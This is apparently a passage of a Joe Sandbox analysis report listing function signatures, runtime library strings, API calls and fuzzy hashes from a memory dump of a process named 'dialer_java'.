                                      • Instruction Fuzzy Hash: AB01D8E3F05A8642EB189B19E9953BD6B51AF447C0F448431CA5C57696EE2DD4C18305
                                      APIs
                                        • Part of subcall function 00007FF6E3A68C00: InitOnceExecuteOnce.KERNEL32(?,?,?,?,00007FF6E3A64D18,?,?,?,00007FF6E3A62E71,?,?,00007FF6E3B8CC48,00000000,00007FF6E3A61609), ref: 00007FF6E3A68C11
                                      • FlsGetValue.KERNEL32(?,?,?,00007FF6E3A62E71,?,?,00007FF6E3B8CC48,00000000,00007FF6E3A61609,?,?,?,?,00007FF6E3A61315), ref: 00007FF6E3A64D22
                                        • Part of subcall function 00007FF6E3A68C90: FlsSetValue.KERNEL32(?,?,?,?,00007FF6E3A64E16), ref: 00007FF6E3A68C94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: OnceValue$ExecuteInitcallocmemset
                                      • String ID: cannot allocate __cxa_eh_globals$execute once failure in __cxa_get_globals_fast()$std::__libcpp_tls_set failure in __cxa_get_globals()
                                      • API String ID: 2044551959-1509371760
                                      • Opcode ID: f1f45e0f00f5ce3d31606f51eb7ee3d72e9977eaa92f880a2da06ea4c8e6213e
                                      • Instruction ID: b18a2819d8dd214c79bd0270eecbb3ce3569fd339beeea06a789876b6e904ba3
                                      • Opcode Fuzzy Hash: f1f45e0f00f5ce3d31606f51eb7ee3d72e9977eaa92f880a2da06ea4c8e6213e
                                      • Instruction Fuzzy Hash: 46014F22F3960781FB54A71DA8573B43A845F90380F410939D90DE62E3FE2FB8D1830A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fflushgetenv
                                      • String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_resume(cursor=%p)
                                      • API String ID: 1137233558-227906034
                                      • Opcode ID: ad86456c92fa133b36f51f89e8403052f5c7942e73ceb2515f9f788c2fc91f6d
                                      • Instruction ID: e2f168253bf180122d0dc237ff5f9e3527f5de8d600965d1fab17c52087c5847
                                      • Opcode Fuzzy Hash: ad86456c92fa133b36f51f89e8403052f5c7942e73ceb2515f9f788c2fc91f6d
                                      • Instruction Fuzzy Hash: D1011E13F1A69741FB14571EB81A3783E985F66B80F054436C94EB33A1DD1E6586830B
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: CriticalLeaveSection$free
                                      • String ID:
                                      • API String ID: 2017658852-0
                                      • Opcode ID: 21f2af2da6d99c8440ba50e04c259726af40d8d037963cadd681417a98c49a5a
                                      • Instruction ID: 494b866244919c33685a64f1a182bdf59909f9b0cccfbca76320643a01bf0d1f
                                      • Opcode Fuzzy Hash: 21f2af2da6d99c8440ba50e04c259726af40d8d037963cadd681417a98c49a5a
                                      • Instruction Fuzzy Hash: EE518D23B0968780FB54AF09A95A3757FA2AF59784F080435C94EA7790DE3EE4C0C34A
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: 06bcf27b9f9da240dc0868757c2916d576c3230e37a736bb9f8626e71eb8801a
                                      • Instruction ID: 3ee7316f26603853003cb309757d0b0eafe53b4275d802af6fa64fc695da9763
                                      • Opcode Fuzzy Hash: 06bcf27b9f9da240dc0868757c2916d576c3230e37a736bb9f8626e71eb8801a
                                      • Instruction Fuzzy Hash: 5F91F8B7B2424287E7388E1EE1527797B91EB14794F018135CB5AD3BA0DE3EF4808B05
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID:
                                      • API String ID: 471065373-0
                                      • Opcode ID: fbc8c95ca6f8518ba7c3563b4af5def5134fbf6b9430f51e1a2fd6be112007f3
                                      • Instruction ID: 822315a8a4e12097bc08b2ea2ecff5b12f26bf6afd2cd9a30ae1a251d8d6388e
                                      • Opcode Fuzzy Hash: fbc8c95ca6f8518ba7c3563b4af5def5134fbf6b9430f51e1a2fd6be112007f3
                                      • Instruction Fuzzy Hash: 34518DB3A06B8682DF258F5AE444269B761FB58BC4F048132CB8E537A4DF3DE091C305
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fputclocaleconv
                                      • String ID:
                                      • API String ID: 697933784-0
                                      • Opcode ID: e7dc6929fcf4cc6b6d4a8017c3bf5789be4cf754bd583aa0524452777b434767
                                      • Instruction ID: 4c3e860da28b129567ebe8463689e3d50db76f06b7044e1fbb2f97748d8e0bc2
                                      • Opcode Fuzzy Hash: e7dc6929fcf4cc6b6d4a8017c3bf5789be4cf754bd583aa0524452777b434767
                                      • Instruction Fuzzy Hash: 43417573F04181C6F3349A6AE58A37E7AA2EB14754F200135DB6E92BC1CE2DE5C28755
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: &
                                      • API String ID: 471065373-1010288
                                      • Opcode ID: c46aeaef957640738deddb87f16563f99d08ba3b34def948dc4d2f740d61f949
                                      • Instruction ID: 91ae5ab78d5d3cc9d523ee87ce4dd12dd7c39f4b5fc2a5476e92fc4d34410d81
                                      • Opcode Fuzzy Hash: c46aeaef957640738deddb87f16563f99d08ba3b34def948dc4d2f740d61f949
                                      • Instruction Fuzzy Hash: 9F3192B3609B8582DB25CF29F4802ADBBA1E758BC8F048226DB8D57799DF3DD545C301